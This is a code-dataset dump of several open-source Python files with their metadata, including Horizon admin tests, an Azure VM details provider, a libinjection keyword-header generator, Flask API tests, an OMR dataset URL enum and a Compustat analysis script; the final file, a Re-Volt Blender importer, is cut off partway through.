repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
m3z/HT | openstack_dashboard/dashboards/admin/instances/tests.py | 1 | 6158 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django import http
from django.core.urlresolvers import reverse
from django.utils.datastructures import SortedDict
from mox import IsA
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
class InstanceViewTest(test.BaseAdminViewTests):
@test.create_stubs({api.nova: ('flavor_list', 'server_list',),
api.keystone: ('tenant_list',)})
def test_index(self):
servers = self.servers.list()
flavors = self.flavors.list()
tenants = self.tenants.list()
api.keystone.tenant_list(IsA(http.HttpRequest), admin=True).\
AndReturn(tenants)
api.nova.server_list(IsA(http.HttpRequest),
all_tenants=True).AndReturn(servers)
api.nova.flavor_list(IsA(http.HttpRequest)).AndReturn(flavors)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:instances:index'))
self.assertTemplateUsed(res, 'admin/instances/index.html')
instances = res.context['table'].data
self.assertItemsEqual(instances, servers)
@test.create_stubs({api.nova: ('flavor_list', 'flavor_get',
'server_list',),
api.keystone: ('tenant_list',)})
def test_index_flavor_list_exception(self):
servers = self.servers.list()
tenants = self.tenants.list()
flavors = self.flavors.list()
full_flavors = SortedDict([(f.id, f) for f in flavors])
api.nova.server_list(IsA(http.HttpRequest),
all_tenants=True).AndReturn(servers)
api.nova.flavor_list(IsA(http.HttpRequest)). \
AndRaise(self.exceptions.nova)
api.keystone.tenant_list(IsA(http.HttpRequest), admin=True).\
AndReturn(tenants)
for server in servers:
api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \
AndReturn(full_flavors[server.flavor["id"]])
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:instances:index'))
self.assertTemplateUsed(res, 'admin/instances/index.html')
instances = res.context['table'].data
self.assertItemsEqual(instances, servers)
@test.create_stubs({api.nova: ('flavor_list', 'flavor_get',
'server_list',),
api.keystone: ('tenant_list',)})
def test_index_flavor_get_exception(self):
servers = self.servers.list()
flavors = self.flavors.list()
tenants = self.tenants.list()
max_id = max([int(flavor.id) for flavor in flavors])
for server in servers:
max_id += 1
server.flavor["id"] = max_id
api.nova.server_list(IsA(http.HttpRequest),
all_tenants=True).AndReturn(servers)
api.nova.flavor_list(IsA(http.HttpRequest)). \
AndReturn(flavors)
api.keystone.tenant_list(IsA(http.HttpRequest), admin=True).\
AndReturn(tenants)
for server in servers:
api.nova.flavor_get(IsA(http.HttpRequest), server.flavor["id"]). \
AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:instances:index'))
instances = res.context['table'].data
self.assertTemplateUsed(res, 'admin/instances/index.html')
self.assertMessageCount(res, error=len(servers))
self.assertItemsEqual(instances, servers)
@test.create_stubs({api.nova: ('server_list',)})
def test_index_server_list_exception(self):
api.nova.server_list(IsA(http.HttpRequest),
all_tenants=True).AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:instances:index'))
self.assertTemplateUsed(res, 'admin/instances/index.html')
self.assertEqual(len(res.context['instances_table'].data), 0)
@test.create_stubs({api: ('server_get', 'flavor_get',),
api.keystone: ('tenant_get',)})
def test_ajax_loading_instances(self):
server = self.servers.first()
flavor = self.flavors.list()[0]
tenant = self.tenants.list()[0]
api.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
api.flavor_get(IsA(http.HttpRequest),
server.flavor['id']).AndReturn(flavor)
api.keystone.tenant_get(IsA(http.HttpRequest),
server.tenant_id,
admin=True).AndReturn(tenant)
self.mox.ReplayAll()
url = reverse('horizon:admin:instances:index') + \
"?action=row_update&table=instances&obj_id=" + server.id
res = self.client.get(url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertTemplateUsed(res, "horizon/common/_data_table_row.html")
self.assertContains(res, "test_tenant", 1, 200)
self.assertContains(res, "instance-host", 1, 200)
self.assertContains(res, "server_1", 1, 200)
self.assertContains(res, "10.0.0.1", 1, 200)
self.assertContains(res, "512MB RAM | 1 VCPU | 0 Disk", 1, 200)
self.assertContains(res, "Active", 1, 200)
self.assertContains(res, "Running", 1, 200)
| apache-2.0 | -3,204,556,978,701,150,700 | 42.985714 | 78 | 0.603118 | false |
QualiSystems/Azure-Shell | package/cloudshell/cp/azure/domain/common/vm_details_provider.py | 1 | 5896 | from azure.mgmt.compute.models import StorageAccountTypes
from cloudshell.cp.core.models import VmDetailsProperty, VmDetailsData, VmDetailsNetworkInterface
from cloudshell.cp.azure.domain.vm_management.operations.deploy_operation import get_ip_from_interface_name
class VmDetailsProvider(object):
def __init__(self, network_service, resource_id_parser):
"""
:param cloudshell.cp.azure.domain.services.network_service.NetworkService network_service:
:param AzureResourceIdParser resource_id_parser:
:return:
"""
self.network_service = network_service
self.resource_id_parser = resource_id_parser
def create(self, instance, is_market_place, logger, network_client, group_name):
"""
:param group_name:
:param network_client:
:param instance: azure.mgmt.compute.models.VirtualMachine
:param is_market_place: bool
:param logging.Logger logger:
:return:
"""
vm_instance_data = None
vm_network_data = None
if is_market_place:
vm_instance_data = self._get_vm_instance_data_for_market_place(instance)
vm_network_data = self._get_vm_network_data(instance, network_client, group_name, logger)
logger.info("VM {} was created via market place.".format(instance.name))
else:
vm_instance_data = self._get_vm_instance_data_for_custom_image(instance)
vm_network_data = self._get_vm_network_data(instance, network_client, group_name, logger)
logger.info("VM {} was created via custom image.".format(instance.name))
return VmDetailsData(vmInstanceData=vm_instance_data, vmNetworkData=vm_network_data)
@staticmethod
def _get_vm_instance_data_for_market_place(instance):
data = [
VmDetailsProperty(key='Image Publisher',value= instance.storage_profile.image_reference.publisher),
VmDetailsProperty(key='Image Offer',value= instance.storage_profile.image_reference.offer),
VmDetailsProperty(key='Image SKU',value= instance.storage_profile.image_reference.sku),
VmDetailsProperty(key='VM Size',value= instance.hardware_profile.vm_size),
VmDetailsProperty(key='Operating System',value= instance.storage_profile.os_disk.os_type.name),
VmDetailsProperty(key='Disk Type',value=
'HDD' if instance.storage_profile.os_disk.managed_disk.storage_account_type == StorageAccountTypes.standard_lrs else 'SSD')
]
return data
def _get_vm_instance_data_for_custom_image(self, instance):
image_name = self.resource_id_parser.get_image_name(resource_id=instance.storage_profile.image_reference.id)
resource_group = self.resource_id_parser.get_resource_group_name(resource_id=instance.storage_profile.image_reference.id)
data = [
VmDetailsProperty(key='Image',value= image_name),
VmDetailsProperty(key='Image Resource Group',value= resource_group),
VmDetailsProperty(key='VM Size',value= instance.hardware_profile.vm_size),
VmDetailsProperty(key='Operating System',value= instance.storage_profile.os_disk.os_type.name),
VmDetailsProperty(key='Disk Type',value=
'HDD' if instance.storage_profile.os_disk.managed_disk.storage_account_type == StorageAccountTypes.standard_lrs else 'SSD')
]
return data
def _get_vm_network_data(self, instance, network_client, group_name, logger):
network_interface_objects = []
for network_interface in instance.network_profile.network_interfaces:
nic_name = self.resource_id_parser.get_name_from_resource_id(network_interface.id)
nic = network_client.network_interfaces.get(group_name, nic_name)
ip_configuration = nic.ip_configurations[0]
private_ip = ip_configuration.private_ip_address
public_ip = ''
network_data = [VmDetailsProperty(key="IP", value=ip_configuration.private_ip_address)]
subnet_name = ip_configuration.subnet.id.split('/')[-1]
current_interface = VmDetailsNetworkInterface(interfaceId=nic.resource_guid,
networkId=subnet_name,
isPrimary=nic.primary,
networkData=network_data,
privateIpAddress=private_ip,
publicIpAddress=public_ip)
if ip_configuration.public_ip_address:
public_ip_name = get_ip_from_interface_name(nic_name)
public_ip_object = self.network_service.get_public_ip(network_client=network_client,
group_name=group_name,
ip_name=public_ip_name)
public_ip = public_ip_object.ip_address
network_data.append(VmDetailsProperty(key="Public IP", value=public_ip))
network_data.append(
VmDetailsProperty(key="Public IP Type", value=public_ip_object.public_ip_allocation_method))
# logger.info("VM {} was created with public IP '{}'.".format(instance.name,
# ip_configuration.public_ip_address.ip_address))
logger.info("VM {} was created with public IP '{}'.".format(instance.name, public_ip))
network_data.append(VmDetailsProperty(key="MAC Address", value=nic.mac_address))
network_interface_objects.append(current_interface)
return network_interface_objects | apache-2.0 | 8,312,419,053,083,852,000 | 53.100917 | 150 | 0.61652 | false |
fengjian/libinjection | src/sqlparse2c.py | 3 | 3800 | #!/usr/bin/env python
#
# Copyright 2012, 2013 Nick Galbreath
# [email protected]
# BSD License -- see COPYING.txt for details
#
"""
Converts a libinjection JSON data file to a C header (.h) file
"""
import sys
def toc(obj):
""" main routine """
print """
#ifndef LIBINJECTION_SQLI_DATA_H
#define LIBINJECTION_SQLI_DATA_H
#include "libinjection.h"
#include "libinjection_sqli.h"
typedef struct {
const char *word;
char type;
} keyword_t;
static size_t parse_money(sfilter * sf);
static size_t parse_other(sfilter * sf);
static size_t parse_white(sfilter * sf);
static size_t parse_operator1(sfilter *sf);
static size_t parse_char(sfilter *sf);
static size_t parse_hash(sfilter *sf);
static size_t parse_dash(sfilter *sf);
static size_t parse_slash(sfilter *sf);
static size_t parse_backslash(sfilter * sf);
static size_t parse_operator2(sfilter *sf);
static size_t parse_string(sfilter *sf);
static size_t parse_word(sfilter * sf);
static size_t parse_var(sfilter * sf);
static size_t parse_number(sfilter * sf);
static size_t parse_tick(sfilter * sf);
static size_t parse_ustring(sfilter * sf);
static size_t parse_qstring(sfilter * sf);
static size_t parse_nqstring(sfilter * sf);
static size_t parse_xstring(sfilter * sf);
static size_t parse_bstring(sfilter * sf);
static size_t parse_estring(sfilter * sf);
static size_t parse_bword(sfilter * sf);
"""
#
# Mapping of character to function
#
fnmap = {
'CHAR_WORD' : 'parse_word',
'CHAR_WHITE': 'parse_white',
'CHAR_OP1' : 'parse_operator1',
'CHAR_UNARY': 'parse_operator1',
'CHAR_OP2' : 'parse_operator2',
'CHAR_BANG' : 'parse_operator2',
'CHAR_BACK' : 'parse_backslash',
'CHAR_DASH' : 'parse_dash',
'CHAR_STR' : 'parse_string',
'CHAR_HASH' : 'parse_hash',
'CHAR_NUM' : 'parse_number',
'CHAR_SLASH': 'parse_slash',
'CHAR_SEMICOLON' : 'parse_char',
'CHAR_COMMA': 'parse_char',
'CHAR_LEFTPARENS': 'parse_char',
'CHAR_RIGHTPARENS': 'parse_char',
'CHAR_LEFTBRACE': 'parse_char',
'CHAR_RIGHTBRACE': 'parse_char',
'CHAR_VAR' : 'parse_var',
'CHAR_OTHER': 'parse_other',
'CHAR_MONEY': 'parse_money',
'CHAR_TICK' : 'parse_tick',
'CHAR_UNDERSCORE': 'parse_underscore',
'CHAR_USTRING' : 'parse_ustring',
'CHAR_QSTRING' : 'parse_qstring',
'CHAR_NQSTRING' : 'parse_nqstring',
'CHAR_XSTRING' : 'parse_xstring',
'CHAR_BSTRING' : 'parse_bstring',
'CHAR_ESTRING' : 'parse_estring',
'CHAR_BWORD' : 'parse_bword'
}
print
print "typedef size_t (*pt2Function)(sfilter *sf);"
print "static const pt2Function char_parse_map[] = {"
pos = 0
for character in obj['charmap']:
print " &%s, /* %d */" % (fnmap[character], pos)
pos += 1
print "};"
print
# keywords
# load them
keywords = obj['keywords']
for fingerprint in list(obj[u'fingerprints']):
fingerprint = '0' + fingerprint.upper()
keywords[fingerprint] = 'F'
needhelp = []
for key in keywords.iterkeys():
if key != key.upper():
needhelp.append(key)
for key in needhelp:
tmpv = keywords[key]
del keywords[key]
keywords[key.upper()] = tmpv
print "static const keyword_t sql_keywords[] = {"
for k in sorted(keywords.keys()):
if len(k) > 31:
sys.stderr.write("ERROR: keyword greater than 32 chars\n")
sys.exit(1)
print " {\"%s\", '%s'}," % (k, keywords[k])
print "};"
print "static const size_t sql_keywords_sz = %d;" % (len(keywords), )
print "#endif"
return 0
if __name__ == '__main__':
import json
sys.exit(toc(json.load(sys.stdin)))
| bsd-3-clause | -4,710,446,708,618,401,000 | 27.787879 | 73 | 0.604211 | false |
inconvergent/differential-cloud | modules/helpers.py | 1 | 1866 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
def get_args():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
'--procs',
type=int,
default=4,
help='number of processors.'
)
parser.add_argument(
'--nearl',
type=float,
default=0.003
)
parser.add_argument(
'--midl',
type=float,
default=0.008
)
parser.add_argument(
'--farl',
type=float,
default=0.05
)
parser.add_argument(
'--stp',
type=float,
default=1.0e-7
)
parser.add_argument(
'--reject',
type=float,
default=1.0
)
parser.add_argument(
'--attract',
type=float,
default=0.3
)
parser.add_argument(
'--nmax',
type=int,
default=1000000
)
parser.add_argument(
'--itt',
type=int,
default=10000000000
)
parser.add_argument(
'--vnum',
type=int,
default=10000000000
)
parser.add_argument(
'--stat',
type=int,
default=100
)
parser.add_argument(
'--export',
type=int,
default=1000
)
parser.add_argument(
'--out',
type=str,
default='./res/res'
)
parser.add_argument(
'--startRad',
type=float,
default=0.01
)
parser.add_argument(
'--startNum',
type=int,
default=100
)
return parser.parse_args()
def make_info_str(args):
s = ''
for k in vars(args):
s += '# ' + str(k) + ': ' + str(getattr(args,k)) + '\n'
return s
def print_stats(steps,dm, meta=False):
from time import strftime
from time import time
if isinstance(meta, str):
meta = ' | {:s}'.format(meta)
else:
meta = ''
print(
'{:s} | stp: {:d} sec: {:.2f} v: {:d}{:s}'
.format(
strftime('%d/%m/%y %H:%M:%S'),
steps,
time()-dm.get_start_time(),
dm.get_vnum(),
meta
)
)
return
| mit | -6,956,966,956,868,832,000 | 14.55 | 59 | 0.546088 | false |
SpaceHotDog/Flask_API | test_bucketlist.py | 1 | 3171 | # test_bucketlist.py
import unittest
import os
import json
from app import create_app, db
class BucketlistTestCase(unittest.TestCase):
"""This class represents the bucketlist test case"""
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
self.bucketlist = {'name': 'Go to Borabora for vacation'}
# binds the app to the current context
with self.app.app_context():
# create all tables
db.create_all()
def test_bucketlist_creation(self):
"""Test API can create a bucketlist (POST request)"""
res = self.client().post('/bucketlists/', data=self.bucketlist)
self.assertEqual(res.status_code, 201)
self.assertIn('Go to Borabora', str(res.data))
def test_api_can_get_all_bucketlists(self):
"""Test API can get a bucketlist (GET request)."""
res = self.client().post('/bucketlists/', data=self.bucketlist)
self.assertEqual(res.status_code, 201)
res = self.client().get('/bucketlists/')
self.assertEqual(res.status_code, 200)
self.assertIn('Go to Borabora', str(res.data))
def test_api_can_get_bucketlist_by_id(self):
"""Test API can get a single bucketlist by using it's id."""
rv = self.client().post('/bucketlists/', data=self.bucketlist)
self.assertEqual(rv.status_code, 201)
result_in_json = json.loads(rv.data.decode('utf-8').replace("'", "\""))
result = self.client().get(
'/bucketlists/{}'.format(result_in_json['id']))
self.assertEqual(result.status_code, 200)
self.assertIn('Go to Borabora', str(result.data))
def test_bucketlist_can_be_edited(self):
"""Test API can edit an existing bucketlist. (PUT request)"""
rv = self.client().post(
'/bucketlists/',
data={'name': 'Eat, pray and love'})
self.assertEqual(rv.status_code, 201)
rv = self.client().put(
'/bucketlists/1',
data={
"name": "Dont just eat, but also pray and love :-)"
})
self.assertEqual(rv.status_code, 200)
results = self.client().get('/bucketlists/1')
self.assertIn('Dont just eat', str(results.data))
def test_bucketlist_deletion(self):
"""Test API can delete an existing bucketlist. (DELETE request)."""
rv = self.client().post(
'/bucketlists/',
data={'name': 'Eat, pray and love'})
self.assertEqual(rv.status_code, 201)
res = self.client().delete('/bucketlists/1')
self.assertEqual(res.status_code, 200)
# Test to see if it exists, should return a 404
result = self.client().get('/bucketlists/1')
self.assertEqual(result.status_code, 404)
def tearDown(self):
"""teardown all initialized variables."""
with self.app.app_context():
# drop all tables
db.session.remove()
db.drop_all()
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main()
| unlicense | -8,130,678,617,017,852,000 | 37.670732 | 79 | 0.600442 | false |
apacha/OMR-Datasets | omrdatasettools/OmrDataset.py | 1 | 11026 | from enum import Enum, auto
from typing import Dict
class OmrDataset(Enum):
"""
The available OMR datasets that can be automatically downloaded with Downloader.py
"""
#: The Audiveris OMR dataset from https://github.com/Audiveris/omr-dataset-tools, Copyright 2017 by Hervé Bitteur under AGPL-3.0 license
Audiveris = auto()
#: The Baro Single Stave dataset from http://www.cvc.uab.es/people/abaro/datasets.html, Copyright 2019 Arnau Baró, Pau Riba, Jorge Calvo-Zaragoza, and Alicia Fornés under CC-BY-NC-SA 4.0 license
Baro = auto()
#: The Capitan dataset from http://grfia.dlsi.ua.es/, License unspecified, free for research purposes
Capitan = auto()
#: Custom version of the CVC-MUSCIMA dataset that contains all images in grayscale, binary and with the
#: following staff-line augmentations: interrupted, kanungo, thickness-variation-v1/2, y-variation-v1/2
#: typeset-emulation and whitespeckles. (all data augmentations that could be aligned automatically).
#: The grayscale images are different from the WriterIdentification dataset, in such a way, that they were aligned
#: to the images from the Staff-Removal dataset. This is the recommended dataset for object detection, as the
#: MUSCIMA++ annotations can be used with a variety of underlying images.
#: See https://github.com/apacha/CVC-MUSCIMA to learn more.
CvcMuscima_MultiConditionAligned = auto()
#: The larger version of the CVC-MUSCIMA dataset for staff removal in black and white with augmentations
#: from http://www.cvc.uab.es/cvcmuscima/index_database.html,
#: Copyright 2012 Alicia Fornés, Anjan Dutta, Albert Gordo and Josep Lladós under CC-BY-NC-SA 4.0 license
CvcMuscima_StaffRemoval = auto()
#: The smaller version of the CVC-MUSCIMA dataset for writer identification in grayscale
#: from http://www.cvc.uab.es/cvcmuscima/index_database.html,
#: Copyright 2012 Alicia Fornés, Anjan Dutta, Albert Gordo and Josep Lladós under CC-BY-NC-SA 4.0 license
CvcMuscima_WriterIdentification = auto()
#: Edirom dataset. All rights reserved
Edirom_Bargheer = auto()
#: Edirom datasets on Freischuetz from https://freischuetz-digital.de/edition.html. All rights reserved.
Edirom_FreischuetzDigital = auto()
#: The Fornes Music Symbols dataset from http://www.cvc.uab.es/~afornes/, License unspecified - citation requested
Fornes = auto()
#: The official HOMUS dataset from http://grfia.dlsi.ua.es/homus/, License unspecified.
Homus_V1 = auto()
#: The improved version of the HOMUS dataset with several bugs-fixed from https://github.com/apacha/Homus
Homus_V2 = auto()
#: The MUSCIMA++ dataset from https://ufal.mff.cuni.cz/muscima, Copyright 2017 Jan Hajic jr. under CC-BY-NC-SA 4.0 license
MuscimaPlusPlus_V1 = auto()
#: The second version of the MUSCIMA++ dataset from https://github.com/OMR-Research/muscima-pp
MuscimaPlusPlus_V2 = auto()
#: A sub-set of the MUSCIMA++ annotations that contains bounding-box annotations for staves, staff measures and system measures. It was semi-automatically constructed from existing annotations and manually verified for correctness. The annotations are available in a plain JSON format as well as in the COCO format.
MuscimaPlusPlus_MeasureAnnotations = auto()
#: The OpenOMR Symbols dataset from https://sourceforge.net/projects/openomr/, Copyright 2013 by Arnaud F. Desaedeleer under GPL license
OpenOmr = auto()
#: The Printed Music Symbols dataset from https://github.com/apacha/PrintedMusicSymbolsDataset, Copyright 2017 by Alexander Pacha under MIT license
Printed = auto()
#: The Rebelo dataset (part 1) with music symbols from http://www.inescporto.pt/~arebelo/index.php, Copyright 2017 by Ana Rebelo under CC BY-SA 4.0 license
Rebelo1 = auto()
#: The Rebelo dataset (part 2) with music symbols from http://www.inescporto.pt/~arebelo/index.php, Copyright 2017 by Ana Rebelo under CC BY-SA 4.0 license
Rebelo2 = auto()
#: The DeepScore dataset (version 1) with extended vocabulary from https://tuggeluk.github.io/downloads/, License unspecified.
DeepScores_V1_Extended = auto()
#: The AudioLabs v1 dataset (aka. Measure Bounding Box Annotation) from https://www.audiolabs-erlangen.de/resources/MIR/2019-ISMIR-LBD-Measures, Copyright 2019 by Frank Zalkow, Angel Villar Corrales, TJ Tsai, Vlora Arifi-Müller, and Meinard Müller under CC BY-NC-SA 4.0 license
AudioLabs_v1 = auto()
#: The AudioLabs v2 dataset, enhanced with staves, staff measures and the original system measures. The annotations are available in csv, JSON and COCO format.
AudioLabs_v2 = auto()
#: The Accidentals detection dataset by Kwon-Young Choi from https://www-intuidoc.irisa.fr/en/choi_accidentals/, License unspecified.
ChoiAccidentals = auto()
def get_dataset_download_url(self) -> str:
""" Returns the url of the selected dataset.
Example usage: OmrDataset.Fornes.get_dataset_download_url() """
return self.dataset_download_urls()[self.name]
def get_dataset_filename(self) -> str:
""" Returns the name of the downloaded zip file of a dataset.
Example usage: OmrDataset.Fornes.get_dataset_filename() """
return self.dataset_file_names()[self.name]
def dataset_download_urls(self) -> Dict[str, str]:
""" Returns a mapping with all URLs, mapped from their enum keys """
return {
# Official URL: https://github.com/Audiveris/omr-dataset-tools/tree/master/data/input-images
"Audiveris": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/AudiverisOmrDataset.zip",
# Official URL: http://www.cvc.uab.es/people/abaro/datasets/MUSCIMA_ABARO.zip
"Baro": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/BaroMuscima.zip",
# Official URL: http://grfia.dlsi.ua.es/cm/projects/timul/databases/BimodalHandwrittenSymbols.zip
"Capitan": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/BimodalHandwrittenSymbols.zip",
# Official URL: http://www.cvc.uab.es/cvcmuscima/CVCMUSCIMA_WI.zip
"CvcMuscima_WriterIdentification": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVCMUSCIMA_WI.zip",
# Official URL: http://www.cvc.uab.es/cvcmuscima/CVCMUSCIMA_SR.zip
"CvcMuscima_StaffRemoval": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVCMUSCIMA_SR.zip",
# Official URL: https://github.com/apacha/CVC-MUSCIMA
"CvcMuscima_MultiConditionAligned": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVCMUSCIMA_MCA.zip",
"Edirom_Bargheer": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Bargheer.zip",
"Edirom_FreischuetzDigital": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/FreischuetzDigital.zip",
# Official URL: http://www.cvc.uab.es/cvcmuscima/datasets/Music_Symbols.zip
"Fornes": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Music_Symbols.zip",
# Official URL: http://grfia.dlsi.ua.es/homus/HOMUS.zip
"Homus_V1": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/HOMUS.zip",
# Official URL: https://github.com/apacha/Homus
"Homus_V2": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/HOMUS-2.0.zip",
# Official URL: https://lindat.mff.cuni.cz/repository/xmlui/bitstream/handle/11372/LRT-2372/MUSCIMA-pp_v1.0.zip?sequence=1&isAllowed=y
"MuscimaPlusPlus_V1": "https://github.com/OMR-Research/muscima-pp/releases/download/v1.0/MUSCIMA-pp_v1.0.zip",
# Official URL: https://github.com/OMR-Research/muscima-pp
"MuscimaPlusPlus_V2": "https://github.com/OMR-Research/muscima-pp/releases/download/v2.0/MUSCIMA-pp_v2.0.zip",
"MuscimaPlusPlus_Images": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/CVC_MUSCIMA_PP_Annotated-Images.zip",
"MuscimaPlusPlus_MeasureAnnotations": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/MUSCIMA-pp_v1.0-measure-annotations.zip",
# Official URL: https://sourceforge.net/projects/openomr/
"OpenOmr": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/OpenOMR-Dataset.zip",
"Printed": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/PrintedMusicSymbolsDataset.zip",
"Rebelo1": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Rebelo-Music-Symbol-Dataset1.zip",
"Rebelo2": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/Rebelo-Music-Symbol-Dataset2.zip",
"DeepScores_V1_Extended": "https://repository.cloudlab.zhaw.ch/artifactory/deepscores/ds_extended.zip",
# Official URL: https://www.audiolabs-erlangen.de/resources/MIR/2019-ISMIR-LBD-Measures
"AudioLabs_v1": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/AudioLabs_v1.zip",
"AudioLabs_v2": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/AudioLabs_v2.zip",
# Official URL: https://www-intuidoc.irisa.fr/en/choi_accidentals/
"ChoiAccidentals": "https://github.com/apacha/OMR-Datasets/releases/download/datasets/choi_accidentals_dataset.zip"
}
def dataset_file_names(self) -> Dict[str, str]:
""" Returns a map of all file_names, mapped from their enum keys """
return {
"Audiveris": "AudiverisOmrDataset.zip",
"Baro": "BaroMuscima.zip",
"Capitan": "BimodalHandwrittenSymbols.zip",
"CvcMuscima_WriterIdentification": "CVCMUSCIMA_WI.zip",
"CvcMuscima_StaffRemoval": "CVCMUSCIMA_SR.zip",
"CvcMuscima_MultiConditionAligned": "CVCMUSCIMA_MCA.zip",
"Edirom_Bargheer": "Bargheer.zip",
"Edirom_FreischuetzDigital": "FreischuetzDigital.zip",
"Fornes": "Music_Symbols.zip",
"Homus_V1": "HOMUS.zip",
"Homus_V2": "HOMUS-2.0.zip",
"MuscimaPlusPlus_V1": "MUSCIMA-pp_v1.0.zip",
"MuscimaPlusPlus_V2": "MUSCIMA-pp_v2.0.zip",
"MuscimaPlusPlus_Images": "CVC_MUSCIMA_PP_Annotated-Images.zip",
"MuscimaPlusPlus_MeasureAnnotations": "MUSCIMA-pp_v1.0-measure-annotations.zip",
"OpenOmr": "OpenOMR-Dataset.zip",
"Printed": "PrintedMusicSymbolsDataset.zip",
"Rebelo1": "Rebelo-Music-Symbol-Dataset1.zip",
"Rebelo2": "Rebelo-Music-Symbol-Dataset2.zip",
"DeepScores_V1_Extended": "ds_extended.zip",
"AudioLabs_v1": "AudioLabs_v1.zip",
"AudioLabs_v2": "AudioLabs_v2.zip",
"ChoiAccidentals": "choi_accidentals_dataset.zip"
}
| mit | -4,851,323,977,944,946,000 | 58.551351 | 319 | 0.699737 | false |
khrapovs/datastorage | datastorage/compustat.py | 1 | 2589 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Short interest dynamics
"""
from __future__ import print_function, division
import os
import zipfile
import datetime as dt
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
path = os.getenv("HOME") + '/Dropbox/Research/data/Compustat/data/'
# __location__ = os.path.realpath(os.path.join(os.getcwd(),
# os.path.dirname(__file__)))
# path = os.path.join(__location__, path + 'Compustat/data/')
def date_convert(string):
return dt.datetime.strptime(string, '%d-%m-%Y')
def import_data():
"""Import data and save it to the disk.
"""
zf = zipfile.ZipFile(path + 'short_int.zip', 'r')
name = zf.namelist()[0]
short_int = pd.read_csv(zf.open(name),
converters={'datadate': date_convert})
columns = {'datadate': 'date',
'SHORTINTADJ': 'short_int',
'GVKEY': 'gvkey'}
short_int.rename(columns=columns, inplace=True)
short_int.set_index(['gvkey', 'date'], inplace=True)
short_int.sort_index(inplace=True)
short_int.to_hdf(path + 'short_int.h5', key='short_int')
print(short_int.head())
print(short_int.dtypes)
print('Number of unique companies: ',
short_int.index.get_level_values('gvkey').nunique())
print('Number of unique dates: ',
short_int.index.get_level_values('date').nunique())
print('Min and Max date: ',
short_int.index.get_level_values('date').min().date(), ',',
short_int.index.get_level_values('date').max().date())
def load_data():
"""Load data from disk and check for sanity.
"""
return pd.read_hdf(path + 'short_int.h5', 'short_int')
def count_companies(short_int):
"""Plot number of companies over time.
"""
df = short_int.reset_index().groupby('date')['gvkey'].nunique()
sns.set_context('paper')
df.plot(figsize=(10, 3))
plt.show()
data = df.ix[dt.date(2006, 1, 1):dt.date(2007, 6, 30)]
data.plot(figsize=(10, 3))
plt.show()
def mean_short_int(short_int):
"""Mean short interest on each date.
"""
df = short_int.groupby(level='date')['short_int'].mean()
sns.set_context('paper')
df.plot(figsize=(10, 3))
plt.show()
df.ix[:dt.date(2004, 12, 31)].plot(figsize=(10, 3))
plt.show()
df.ix[dt.date(2006, 1, 1):dt.date(2007, 6, 30)].plot(figsize=(10, 3))
plt.show()
if __name__ == '__main__':
import_data()
short_int = load_data()
count_companies(short_int)
mean_short_int(short_int)
| mit | 2,111,269,302,578,816,300 | 24.382353 | 73 | 0.596756 | false |
Yethiel/re-volt-addon | io_revolt/parameters_in.py | 1 | 4567 | """
Name: parameters_in
Purpose: Importing cars using the parameters.txt file
Description:
Imports entire cars using the carinfo module.
"""
if "bpy" in locals():
import imp
imp.reload(common)
imp.reload(carinfo)
imp.reload(prm_in)
import os
import bpy
import bmesh
from mathutils import Vector
from . import common
from . import carinfo
from . import prm_in
from .common import *
def import_file(filepath, scene):
"""
Imports a parameters.txt file and loads car body and wheels.
"""
PARAMETERS[filepath] = carinfo.read_parameters(filepath)
# Imports the car with all supported files
import_car(scene, PARAMETERS[filepath], filepath)
# Removes parameters from dict so they can be reloaded next time
PARAMETERS.pop(filepath)
def import_car(scene, params, filepath):
body = params["model"][params["body"]["modelnum"]]
body_loc = to_blender_coord(params["body"]["offset"])
wheel0loc = to_blender_coord(params["wheel"][0]["offset1"])
wheel1loc = to_blender_coord(params["wheel"][1]["offset1"])
wheel2loc = to_blender_coord(params["wheel"][2]["offset1"])
